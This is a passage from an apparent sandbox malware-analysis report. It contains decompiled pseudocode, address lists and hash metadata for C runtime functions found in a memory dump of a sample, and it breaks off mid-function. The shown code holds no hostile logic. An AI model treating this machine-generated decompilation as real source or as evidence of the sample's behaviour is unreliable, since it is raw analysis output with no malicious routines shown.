                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _fseek_malloc_memset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 208892515-0
                                                                                                                                                                                                    • Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                                                                                    • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                                                    			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                    				signed int _t59;
                                                                                                                                                                                                    				intOrPtr* _t61;
                                                                                                                                                                                                    				signed int _t63;
                                                                                                                                                                                                    				void* _t68;
                                                                                                                                                                                                    				signed int _t69;
                                                                                                                                                                                                    				signed int _t72;
                                                                                                                                                                                                    				signed int _t74;
                                                                                                                                                                                                    				signed int _t75;
                                                                                                                                                                                                    				signed int _t77;
                                                                                                                                                                                                    				signed int _t78;
                                                                                                                                                                                                    				signed int _t81;
                                                                                                                                                                                                    				signed int _t82;
                                                                                                                                                                                                    				signed int _t84;
                                                                                                                                                                                                    				signed int _t88;
                                                                                                                                                                                                    				signed int _t97;
                                                                                                                                                                                                    				signed int _t98;
                                                                                                                                                                                                    				signed int _t99;
                                                                                                                                                                                                    				intOrPtr* _t100;
                                                                                                                                                                                                    				void* _t101;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t90 = __edx;
                                                                                                                                                                                                    				if(_a8 == 0 || _a12 == 0) {
                                                                                                                                                                                                    					L4:
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t100 = _a16;
                                                                                                                                                                                                    					_t105 = _t100;
                                                                                                                                                                                                    					if(_t100 != 0) {
                                                                                                                                                                                                    						_t82 = _a4;
                                                                                                                                                                                                    						__eflags = _t82;
                                                                                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t63 = _t59 | 0xffffffff;
                                                                                                                                                                                                    						_t90 = _t63 % _a8;
                                                                                                                                                                                                    						__eflags = _a12 - _t63 / _a8;
                                                                                                                                                                                                    						if(__eflags > 0) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t97 = _a8 * _a12;
                                                                                                                                                                                                    						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                                                                                                                                                                                                    						_v8 = _t82;
                                                                                                                                                                                                    						_v16 = _t97;
                                                                                                                                                                                                    						_t81 = _t97;
                                                                                                                                                                                                    						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                                                                                                                                                                                                    							_v12 = 0x1000;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_v12 =  *(_t100 + 0x18);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _t97;
                                                                                                                                                                                                    						if(_t97 == 0) {
                                                                                                                                                                                                    							L32:
                                                                                                                                                                                                    							return _a12;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								_t84 =  *(_t100 + 0xc) & 0x00000108;
                                                                                                                                                                                                    								__eflags = _t84;
                                                                                                                                                                                                    								if(_t84 == 0) {
                                                                                                                                                                                                    									L18:
                                                                                                                                                                                                    									__eflags = _t81 - _v12;
                                                                                                                                                                                                    									if(_t81 < _v12) {
                                                                                                                                                                                                    										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
                                                                                                                                                                                                    										__eflags = _t68 - 0xffffffff;
                                                                                                                                                                                                    										if(_t68 == 0xffffffff) {
                                                                                                                                                                                                    											L34:
                                                                                                                                                                                                    											_t69 = _t97;
                                                                                                                                                                                                    											L35:
                                                                                                                                                                                                    											return (_t69 - _t81) / _a8;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_v8 = _v8 + 1;
                                                                                                                                                                                                    										_t72 =  *(_t100 + 0x18);
                                                                                                                                                                                                    										_t81 = _t81 - 1;
                                                                                                                                                                                                    										_v12 = _t72;
                                                                                                                                                                                                    										__eflags = _t72;
                                                                                                                                                                                                    										if(_t72 <= 0) {
                                                                                                                                                                                                    											_v12 = 1;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										goto L31;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									__eflags = _t84;
                                                                                                                                                                                                    									if(_t84 == 0) {
                                                                                                                                                                                                    										L21:
                                                                                                                                                                                                    										__eflags = _v12;
                                                                                                                                                                                                    										_t98 = _t81;
                                                                                                                                                                                                    										if(_v12 != 0) {
                                                                                                                                                                                                    											_t75 = _t81;
                                                                                                                                                                                                    											_t90 = _t75 % _v12;
                                                                                                                                                                                                    											_t98 = _t98 - _t75 % _v12;
                                                                                                                                                                                                    											__eflags = _t98;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_push(_t98);
                                                                                                                                                                                                    										_push(_v8);
                                                                                                                                                                                                    										_push(E0040FA20(_t90, _t98, _t100));
                                                                                                                                                                                                    										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
                                                                                                                                                                                                    										_t101 = _t101 + 0xc;
                                                                                                                                                                                                    										__eflags = _t74 - 0xffffffff;
                                                                                                                                                                                                    										if(_t74 == 0xffffffff) {
                                                                                                                                                                                                    											L36:
                                                                                                                                                                                                    											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                                                                                                                                                                                                    											_t69 = _v16;
                                                                                                                                                                                                    											goto L35;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											_t88 = _t98;
                                                                                                                                                                                                    											__eflags = _t74 - _t98;
                                                                                                                                                                                                    											if(_t74 <= _t98) {
                                                                                                                                                                                                    												_t88 = _t74;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_v8 = _v8 + _t88;
                                                                                                                                                                                                    											_t81 = _t81 - _t88;
                                                                                                                                                                                                    											__eflags = _t74 - _t98;
                                                                                                                                                                                                    											if(_t74 < _t98) {
                                                                                                                                                                                                    												goto L36;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												L27:
                                                                                                                                                                                                    												_t97 = _v16;
                                                                                                                                                                                                    												goto L31;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t77 = E0040C1FB(_t100);
                                                                                                                                                                                                    									__eflags = _t77;
                                                                                                                                                                                                    									if(_t77 != 0) {
                                                                                                                                                                                                    										goto L34;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L21;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t78 =  *(_t100 + 4);
                                                                                                                                                                                                    								__eflags = _t78;
                                                                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                                                                    									goto L18;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								if(__eflags < 0) {
                                                                                                                                                                                                    									_t48 = _t100 + 0xc;
                                                                                                                                                                                                    									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                                                                                                                                                                                                    									__eflags =  *_t48;
                                                                                                                                                                                                    									goto L34;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t99 = _t81;
                                                                                                                                                                                                    								__eflags = _t81 - _t78;
                                                                                                                                                                                                    								if(_t81 >= _t78) {
                                                                                                                                                                                                    									_t99 = _t78;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
                                                                                                                                                                                                    								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                                                                                                                                                                                                    								 *_t100 =  *_t100 + _t99;
                                                                                                                                                                                                    								_t101 = _t101 + 0xc;
                                                                                                                                                                                                    								_t81 = _t81 - _t99;
                                                                                                                                                                                                    								_v8 = _v8 + _t99;
                                                                                                                                                                                                    								goto L27;
                                                                                                                                                                                                    								L31:
                                                                                                                                                                                                    								__eflags = _t81;
                                                                                                                                                                                                    							} while (_t81 != 0);
                                                                                                                                                                                                    							goto L32;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L3:
                                                                                                                                                                                                    					_t61 = E0040BFC1(_t105);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					 *_t61 = 0x16;
                                                                                                                                                                                                    					E0040E744(_t90, 0, _t100);
                                                                                                                                                                                                    					goto L4;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}





























                                                                                                                                                                                                    0x0040baaa
                                                                                                                                                                                                    0x0040baba
                                                                                                                                                                                                    0x0040bae0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bac1
                                                                                                                                                                                                    0x0040bac1
                                                                                                                                                                                                    0x0040bac4
                                                                                                                                                                                                    0x0040bac6
                                                                                                                                                                                                    0x0040bae7
                                                                                                                                                                                                    0x0040baea
                                                                                                                                                                                                    0x0040baec
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040baee
                                                                                                                                                                                                    0x0040baf3
                                                                                                                                                                                                    0x0040baf6
                                                                                                                                                                                                    0x0040baf9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bafe
                                                                                                                                                                                                    0x0040bb02
                                                                                                                                                                                                    0x0040bb09
                                                                                                                                                                                                    0x0040bb0c
                                                                                                                                                                                                    0x0040bb0f
                                                                                                                                                                                                    0x0040bb11
                                                                                                                                                                                                    0x0040bb1b
                                                                                                                                                                                                    0x0040bb13
                                                                                                                                                                                                    0x0040bb16
                                                                                                                                                                                                    0x0040bb16
                                                                                                                                                                                                    0x0040bb22
                                                                                                                                                                                                    0x0040bb24
                                                                                                                                                                                                    0x0040bbe9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bb2a
                                                                                                                                                                                                    0x0040bb2a
                                                                                                                                                                                                    0x0040bb2d
                                                                                                                                                                                                    0x0040bb2d
                                                                                                                                                                                                    0x0040bb33
                                                                                                                                                                                                    0x0040bb64
                                                                                                                                                                                                    0x0040bb64
                                                                                                                                                                                                    0x0040bb67
                                                                                                                                                                                                    0x0040bbc0
                                                                                                                                                                                                    0x0040bbc7
                                                                                                                                                                                                    0x0040bbca
                                                                                                                                                                                                    0x0040bbf5
                                                                                                                                                                                                    0x0040bbf5
                                                                                                                                                                                                    0x0040bbf7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bbfb
                                                                                                                                                                                                    0x0040bbcc
                                                                                                                                                                                                    0x0040bbcf
                                                                                                                                                                                                    0x0040bbd2
                                                                                                                                                                                                    0x0040bbd3
                                                                                                                                                                                                    0x0040bbd6
                                                                                                                                                                                                    0x0040bbd8
                                                                                                                                                                                                    0x0040bbda
                                                                                                                                                                                                    0x0040bbda
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bbd8
                                                                                                                                                                                                    0x0040bb69
                                                                                                                                                                                                    0x0040bb6b
                                                                                                                                                                                                    0x0040bb78
                                                                                                                                                                                                    0x0040bb78
                                                                                                                                                                                                    0x0040bb7c
                                                                                                                                                                                                    0x0040bb7e
                                                                                                                                                                                                    0x0040bb82
                                                                                                                                                                                                    0x0040bb84
                                                                                                                                                                                                    0x0040bb87
                                                                                                                                                                                                    0x0040bb87
                                                                                                                                                                                                    0x0040bb87
                                                                                                                                                                                                    0x0040bb89
                                                                                                                                                                                                    0x0040bb8a
                                                                                                                                                                                                    0x0040bb94
                                                                                                                                                                                                    0x0040bb95
                                                                                                                                                                                                    0x0040bb9a
                                                                                                                                                                                                    0x0040bb9d
                                                                                                                                                                                                    0x0040bba0
                                                                                                                                                                                                    0x0040bc03
                                                                                                                                                                                                    0x0040bc03
                                                                                                                                                                                                    0x0040bc07
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bba2
                                                                                                                                                                                                    0x0040bba2
                                                                                                                                                                                                    0x0040bba4
                                                                                                                                                                                                    0x0040bba6
                                                                                                                                                                                                    0x0040bba8
                                                                                                                                                                                                    0x0040bba8
                                                                                                                                                                                                    0x0040bbaa
                                                                                                                                                                                                    0x0040bbad
                                                                                                                                                                                                    0x0040bbaf
                                                                                                                                                                                                    0x0040bbb1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bbb3
                                                                                                                                                                                                    0x0040bbb3
                                                                                                                                                                                                    0x0040bbb3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bbb3
                                                                                                                                                                                                    0x0040bbb1
                                                                                                                                                                                                    0x0040bba0
                                                                                                                                                                                                    0x0040bb6e
                                                                                                                                                                                                    0x0040bb74
                                                                                                                                                                                                    0x0040bb76
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bb76
                                                                                                                                                                                                    0x0040bb35
                                                                                                                                                                                                    0x0040bb38
                                                                                                                                                                                                    0x0040bb3a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bb3c
                                                                                                                                                                                                    0x0040bbf1
                                                                                                                                                                                                    0x0040bbf1
                                                                                                                                                                                                    0x0040bbf1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bbf1
                                                                                                                                                                                                    0x0040bb42
                                                                                                                                                                                                    0x0040bb44
                                                                                                                                                                                                    0x0040bb46
                                                                                                                                                                                                    0x0040bb48
                                                                                                                                                                                                    0x0040bb48
                                                                                                                                                                                                    0x0040bb50
                                                                                                                                                                                                    0x0040bb55
                                                                                                                                                                                                    0x0040bb58
                                                                                                                                                                                                    0x0040bb5a
                                                                                                                                                                                                    0x0040bb5d
                                                                                                                                                                                                    0x0040bb5f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bbe1
                                                                                                                                                                                                    0x0040bbe1
                                                                                                                                                                                                    0x0040bbe1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bb2a
                                                                                                                                                                                                    0x0040bb24
                                                                                                                                                                                                    0x0040bac8
                                                                                                                                                                                                    0x0040bac8
                                                                                                                                                                                                    0x0040bacd
                                                                                                                                                                                                    0x0040bace
                                                                                                                                                                                                    0x0040bacf
                                                                                                                                                                                                    0x0040bad0
                                                                                                                                                                                                    0x0040bad1
                                                                                                                                                                                                    0x0040bad2
                                                                                                                                                                                                    0x0040bad8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040badd

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __flush.LIBCMT ref: 0040BB6E
                                                                                                                                                                                                    • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                                                                                                    • __locking.LIBCMT ref: 0040BB95
                                                                                                                                                                                                    • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                                                                                                      • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                      • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3240763771-0
                                                                                                                                                                                                    • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                    • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                    				char _t43;
                                                                                                                                                                                                    				char _t46;
                                                                                                                                                                                                    				signed int _t53;
                                                                                                                                                                                                    				signed int _t54;
                                                                                                                                                                                                    				intOrPtr _t56;
                                                                                                                                                                                                    				int _t57;
                                                                                                                                                                                                    				int _t58;
                                                                                                                                                                                                    				signed short* _t59;
                                                                                                                                                                                                    				short* _t60;
                                                                                                                                                                                                    				int _t65;
                                                                                                                                                                                                    				char* _t72;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t72 = _a8;
                                                                                                                                                                                                    				if(_t72 == 0 || _a12 == 0) {
                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					if( *_t72 != 0) {
                                                                                                                                                                                                    						E0040EC86( &_v20, _a16);
                                                                                                                                                                                                    						_t43 = _v20;
                                                                                                                                                                                                    						__eflags =  *(_t43 + 0x14);
                                                                                                                                                                                                    						if( *(_t43 + 0x14) != 0) {
                                                                                                                                                                                                    							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
                                                                                                                                                                                                    							__eflags = _t46;
                                                                                                                                                                                                    							if(_t46 == 0) {
                                                                                                                                                                                                    								__eflags = _a4;
                                                                                                                                                                                                    								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                    									L10:
                                                                                                                                                                                                    									__eflags = _v8;
                                                                                                                                                                                                    									if(_v8 != 0) {
                                                                                                                                                                                                    										_t53 = _v12;
                                                                                                                                                                                                    										_t11 = _t53 + 0x70;
                                                                                                                                                                                                    										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                    										__eflags =  *_t11;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									return 1;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								L21:
                                                                                                                                                                                                    								_t54 = E0040BFC1(__eflags);
                                                                                                                                                                                                    								 *_t54 = 0x2a;
                                                                                                                                                                                                    								__eflags = _v8;
                                                                                                                                                                                                    								if(_v8 != 0) {
                                                                                                                                                                                                    									_t54 = _v12;
                                                                                                                                                                                                    									_t33 = _t54 + 0x70;
                                                                                                                                                                                                    									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                    									__eflags =  *_t33;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								return _t54 | 0xffffffff;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t56 = _v20;
                                                                                                                                                                                                    							_t65 =  *(_t56 + 0xac);
                                                                                                                                                                                                    							__eflags = _t65 - 1;
                                                                                                                                                                                                    							if(_t65 <= 1) {
                                                                                                                                                                                                    								L17:
                                                                                                                                                                                                    								__eflags = _a12 -  *(_t56 + 0xac);
                                                                                                                                                                                                    								if(__eflags < 0) {
                                                                                                                                                                                                    									goto L21;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								__eflags = _t72[1];
                                                                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                                                                    									goto L21;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								L19:
                                                                                                                                                                                                    								_t57 =  *(_t56 + 0xac);
                                                                                                                                                                                                    								__eflags = _v8;
                                                                                                                                                                                                    								if(_v8 == 0) {
                                                                                                                                                                                                    									return _t57;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                    								return _t57;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _a12 - _t65;
                                                                                                                                                                                                    							if(_a12 < _t65) {
                                                                                                                                                                                                    								goto L17;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _a4;
                                                                                                                                                                                                    							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                                                    							__eflags = _t58;
                                                                                                                                                                                                    							_t56 = _v20;
                                                                                                                                                                                                    							if(_t58 != 0) {
                                                                                                                                                                                                    								goto L19;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							goto L17;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t59 = _a4;
                                                                                                                                                                                                    						__eflags = _t59;
                                                                                                                                                                                                    						if(_t59 != 0) {
                                                                                                                                                                                                    							 *_t59 =  *_t72 & 0x000000ff;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t60 = _a4;
                                                                                                                                                                                                    						if(_t60 != 0) {
                                                                                                                                                                                                    							 *_t60 = 0;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L5;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}

















                                                                                                                                                                                                    0x004152a9
                                                                                                                                                                                                    0x004152b0
                                                                                                                                                                                                    0x004152c7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004152b7
                                                                                                                                                                                                    0x004152b9
                                                                                                                                                                                                    0x004152d3
                                                                                                                                                                                                    0x004152d8
                                                                                                                                                                                                    0x004152db
                                                                                                                                                                                                    0x004152de
                                                                                                                                                                                                    0x00415307
                                                                                                                                                                                                    0x0041530e
                                                                                                                                                                                                    0x00415310
                                                                                                                                                                                                    0x00415391
                                                                                                                                                                                                    0x004153ac
                                                                                                                                                                                                    0x004153ae
                                                                                                                                                                                                    0x004152ee
                                                                                                                                                                                                    0x004152ee
                                                                                                                                                                                                    0x004152f1
                                                                                                                                                                                                    0x004152f3
                                                                                                                                                                                                    0x004152f6
                                                                                                                                                                                                    0x004152f6
                                                                                                                                                                                                    0x004152f6
                                                                                                                                                                                                    0x004152f6
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004152fc
                                                                                                                                                                                                    0x00415370
                                                                                                                                                                                                    0x00415370
                                                                                                                                                                                                    0x00415375
                                                                                                                                                                                                    0x0041537b
                                                                                                                                                                                                    0x0041537e
                                                                                                                                                                                                    0x00415380
                                                                                                                                                                                                    0x00415383
                                                                                                                                                                                                    0x00415383
                                                                                                                                                                                                    0x00415383
                                                                                                                                                                                                    0x00415383
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00415387
                                                                                                                                                                                                    0x00415312
                                                                                                                                                                                                    0x00415315
                                                                                                                                                                                                    0x0041531b
                                                                                                                                                                                                    0x0041531e
                                                                                                                                                                                                    0x00415345
                                                                                                                                                                                                    0x00415348
                                                                                                                                                                                                    0x0041534e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00415350
                                                                                                                                                                                                    0x00415353
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00415355
                                                                                                                                                                                                    0x00415355
                                                                                                                                                                                                    0x0041535b
                                                                                                                                                                                                    0x0041535e
                                                                                                                                                                                                    0x004152cc
                                                                                                                                                                                                    0x004152cc
                                                                                                                                                                                                    0x00415367
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00415367
                                                                                                                                                                                                    0x00415320
                                                                                                                                                                                                    0x00415323
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00415327
                                                                                                                                                                                                    0x00415338
                                                                                                                                                                                                    0x0041533e
                                                                                                                                                                                                    0x00415340
                                                                                                                                                                                                    0x00415343
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00415343
                                                                                                                                                                                                    0x004152e0
                                                                                                                                                                                                    0x004152e3
                                                                                                                                                                                                    0x004152e5
                                                                                                                                                                                                    0x004152eb
                                                                                                                                                                                                    0x004152eb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004152bb
                                                                                                                                                                                                    0x004152bb
                                                                                                                                                                                                    0x004152c0
                                                                                                                                                                                                    0x004152c4
                                                                                                                                                                                                    0x004152c4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004152c0
                                                                                                                                                                                                    0x004152b9

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                                                                                                    • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3058430110-0
                                                                                                                                                                                                    • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                    • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                                                                                    				intOrPtr _t25;
                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t25 = _a16;
                                                                                                                                                                                                    				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                                                                                                                                    					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t34 = _t25 - 0x66;
                                                                                                                                                                                                    					if(_t25 != 0x66) {
                                                                                                                                                                                                    						__eflags = _t25 - 0x61;
                                                                                                                                                                                                    						if(_t25 == 0x61) {
                                                                                                                                                                                                    							L7:
                                                                                                                                                                                                    							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							__eflags = _t25 - 0x41;
                                                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                                                    								goto L7;
                                                                                                                                                                                                    							} else {
